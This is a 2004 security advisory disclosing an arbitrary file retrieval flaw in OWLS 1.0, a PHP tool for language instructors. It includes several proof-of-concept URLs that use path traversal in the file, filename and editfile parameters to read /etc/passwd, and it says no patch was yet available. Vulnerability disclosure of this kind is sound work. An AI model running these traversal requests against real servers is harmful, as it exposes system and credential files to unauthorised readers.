ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files retrieving
ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files retrieving
Discovered: 05 january 2004
Vendor contacted: 07 january 2004
Published: 18 february 2004
Name: OWLS
Affected Systems: 1.0
Issue: Remote file retrieving
Author: G00db0y from Zone-h Security Labs - g00db0y@xxxxxxxxxx -
zetalabs@xxxxxxxxxx
Vendor: http://www.foolsworkshop.com/owls/
Description
***********
Zone-h Security Team has discovered a flaw in OWLS 1.0. There is a
vulnerability in the current version of OWLS that allows an attacker to
retrieve arbitrary files from the webserver with its priviledges.
"OWLS is a web-based environment for instructors of language to easily create
exercises, readings, glossaries, and present media for their students. Once
installed on a web server that supports PHP,
instructors can create materials or upload media for presentation to their
students through a simple form based interface"
Details
*******
It's possibile for a remote attacker to retrieve any file from a webserver.
Multiple files are affected with this problem.
For example try this:
http://address/owls/glossaries/index.php?file=/etc/passwd
http://address/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print
http://address/owls/readings/index.php?filename=/etc/passwd
http://address/owls/multiplechoice/resultsignore.php?filename=/etc/passwd
http://address/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd
http://address/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd
Solution:
*********
The vendor has been contacted and a patch was not yet produced.
G00db0y from Zone-h Security Labs - g00db0y@xxxxxxxxxx - zetalabs@xxxxxxxxxx
http://www.zone-h.org/en/advisories/read/id=3973/